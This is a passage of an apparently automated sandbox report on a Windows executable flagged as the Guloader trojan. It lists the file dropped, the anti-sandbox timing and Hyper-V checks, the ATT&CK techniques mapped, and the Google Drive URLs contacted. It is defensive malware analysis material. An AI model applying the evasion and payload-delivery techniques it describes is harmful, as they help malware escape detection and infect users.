      Source: Binary string: mshtml.pdbUGP source: eAvqHiIsgR.exe, 00000005.00000001.3014050389.0000000000649000.00000008.00000001.01000000.00000007.sdmp

      Data Obfuscation

      barindex
      Source: Yara matchFile source: 00000005.00000002.4521613318.00000000021F4000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.3670179410.0000000003404000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeCode function: 0_2_72A41A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_72A41A98
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeCode function: 0_2_72A42F60 push eax; ret 0_2_72A42F8E
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeFile created: C:\Users\user\AppData\Local\Temp\nso2EAF.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeAPI/Special instruction interceptor: Address: 371B13C
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeAPI/Special instruction interceptor: Address: 250B13C
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeRDTSC instruction interceptor: First address: 36F59AF second address: 36F59AF instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FA2CD0C010Ah 0x00000006 inc ebp 0x00000007 inc ebx 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeRDTSC instruction interceptor: First address: 24E59AF second address: 24E59AF instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FA2CD0C49EAh 0x00000006 inc ebp 0x00000007 inc ebx 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nso2EAF.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exe TID: 2680Thread sleep time: -250000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeCode function: 0_2_0040646B FindFirstFileA,FindClose,0_2_0040646B
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeCode function: 0_2_004027A1 FindFirstFileA,0_2_004027A1
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeCode function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004058BF
      Source: eAvqHiIsgR.exe, 00000005.00000003.3304104824.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3475549331.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3191224498.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3360279135.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3504923023.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3277143774.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3219868848.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000002.4523418528.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3333159540.000000000344F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: eAvqHiIsgR.exe, 00000005.00000003.3304104824.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3475549331.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3191224498.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3360279135.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3504923023.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3277143774.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3219868848.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000002.4523418528.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3333159540.000000000344F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW*w
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeAPI call chain: ExitProcess graph end nodegraph_0-3983
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeAPI call chain: ExitProcess graph end nodegraph_0-4158
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeCode function: 0_2_72A41A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_72A41A98
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeProcess created: C:\Users\user\Desktop\eAvqHiIsgR.exe "C:\Users\user\Desktop\eAvqHiIsgR.exe"Jump to behavior
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403348
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Native API
      1
      DLL Side-Loading
      1
      Access Token Manipulation
      11
      Masquerading
      OS Credential Dumping21
      Security Software Discovery
      Remote Services1
      Archive Collected Data
      11
      Encrypted Channel
      Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
      Process Injection
      1
      Virtualization/Sandbox Evasion
      LSASS Memory1
      Virtualization/Sandbox Evasion
      Remote Desktop Protocol1
      Clipboard Data
      3
      Ingress Tool Transfer
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
      DLL Side-Loading
      1
      Access Token Manipulation
      Security Account Manager2
      File and Directory Discovery
      SMB/Windows Admin SharesData from Network Shared Drive3
      Non-Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
      Process Injection
      NTDS23
      System Information Discovery
      Distributed Component Object ModelInput Capture14
      Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Obfuscated Files or Information
      LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading
      Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      eAvqHiIsgR.exe61%ReversingLabsWin32.Trojan.Guloader
      eAvqHiIsgR.exe100%AviraTR/Injector.csnhe
      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\nso2EAF.tmp\System.dll0%ReversingLabs
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      https://drive.google.comZT0%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      drive.google.com
      172.217.19.174
      truefalse
        high
        drive.usercontent.google.com
        142.250.181.33
        truefalse
          high
          NameSourceMaliciousAntivirus DetectionReputation
          https://www.google.comeAvqHiIsgR.exe, 00000005.00000003.3587862634.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.0000000003461000.00000004.00000020.00020000.00000000.sdmpfalse
            high
            https://drive.usercontent.google.com/IeAvqHiIsgR.exe, 00000005.00000003.3333159540.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3304104824.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3277143774.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3219868848.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3475549331.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3191224498.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3504923023.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000002.4523418528.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3360279135.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.0000000003461000.00000004.00000020.00020000.00000000.sdmpfalse
              high
              https://drive.usercontent.google.com/JeAvqHiIsgR.exe, 00000005.00000002.4523418528.0000000003433000.00000004.00000020.00020000.00000000.sdmpfalse
                high
                http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdeAvqHiIsgR.exe, 00000005.00000001.3014050389.00000000005F2000.00000008.00000001.01000000.00000007.sdmpfalse
                  high
                  http://nsis.sf.net/NSIS_ErroreAvqHiIsgR.exefalse
                    high
                    https://translate.google.com/translate_a/element.jseAvqHiIsgR.exe, 00000005.00000003.3784646327.00000000034A4000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3587862634.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.0000000003461000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      https://drive.google.com/eAvqHiIsgR.exe, 00000005.00000003.3333159540.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3191224498.0000000003448000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3219868848.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3277143774.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3219868848.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.0000000003446000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3191224498.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3304104824.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3504923023.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3360279135.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3277143774.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000002.4523418528.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3475549331.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000002.4523418528.00000000033F8000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://drive.usercontent.google.com/AeAvqHiIsgR.exe, 00000005.00000002.4523418528.0000000003433000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://drive.google.com/ertificateseAvqHiIsgR.exe, 00000005.00000003.3333159540.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.0000000003446000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3304104824.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3504923023.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3360279135.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3277143774.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3475549331.0000000003447000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://drive.google.com/PbweAvqHiIsgR.exe, 00000005.00000002.4523418528.00000000033F8000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://drive.google.com/reAvqHiIsgR.exe, 00000005.00000003.3333159540.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3219868848.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3360279135.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.0000000003461000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214eAvqHiIsgR.exe, 00000005.00000001.3014050389.0000000000649000.00000008.00000001.01000000.00000007.sdmpfalse
                                  high
                                  http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdeAvqHiIsgR.exe, 00000005.00000001.3014050389.00000000005F2000.00000008.00000001.01000000.00000007.sdmpfalse
                                    high
                                    http://www.ftp.ftp://ftp.gopher.eAvqHiIsgR.exe, 00000005.00000001.3014050389.0000000000649000.00000008.00000001.01000000.00000007.sdmpfalse
                                      high
